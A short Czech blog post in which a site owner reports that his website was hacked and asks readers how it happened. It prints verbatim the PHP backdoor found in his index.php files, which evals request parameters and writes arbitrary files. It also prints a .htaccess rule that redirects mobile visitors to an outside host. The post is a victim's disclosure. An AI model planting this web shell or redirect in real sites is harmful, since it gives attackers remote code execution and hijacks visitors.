Někdo mi hekl web

Čtvrtek, Prosinec 27, 2012

Jak to tak vypadá, tak mi někdo hekl web bronzi.cz. Nevím jak a nevím kudy ale ve všech souborech index.php mám kód podobný tomuto:

<?php
$tnwtu = 'ed40dd507fe53caba3e03ac43883cff8';
if(isset($_REQUEST['skbzdf'])) {
 $tbheg = $_REQUEST['skbzdf']; eval($tbheg); exit(0);
 }
if(isset($_REQUEST['zgryn'])) {
 $zujb = $_REQUEST['agprcb'];
 $ulhup = $_REQUEST['zgryn'];
 $ziohnu = fopen($ulhup, 'w');
 $nbhmojm = fwrite($ziohnu, $zujb);
 fclose($ziohnu);
 echo $nbhmojm;
 exit();
 }
 ?>
<?php
if(isset($_REQUEST['sdqgul_cd'])) {
 $fftw_acxo = $_REQUEST['sdqgul_cd'];
 eval($fftw_acxo);
 }
if(isset($_REQUEST['rtnmcq_jwwe'])) {
 $zvvu_wwj = $_REQUEST['cpc_bdbysw'];
 $lkcob_yxocm = $_REQUEST['rtnmcq_jwwe'];
 file_put_contents($lkcob_yxocm, $zvvu_wwj);
 }
 ?>

Liší se pouze názvy proměnných ale funkčnost je stejná.

A do htaccess se mi dostalo toto:

RewriteEngine On
RewriteCond %{HTTP:X-WAP-PROFILE} !^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(Alcatel|Asus|Android|BlackBerry|Ericsson|Fly|Huawei|i-mate|iPAQ|iPhone|iPod|LG-|LGE-|MDS_|MOT-|Nokia|Palm|Panasonic|Pantech|Philips|Sagem|Samsung|Sharp|SIE-|Symbian|Vodafone|Voxtel|WebOS|Windows\s+CE|ZTE-|Zune).*$ [NC,OR]
RewriteCond %{HTTP_ACCEPT} application/vnd.wap.xhtml\+xml [NC,OR]
RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml [NC]
RewriteRule ^(.*) http://crzyluxtds.in/go.php?sid=1 [L,R=302]

Víte někdo odkud vítr vane?

Napsat komentář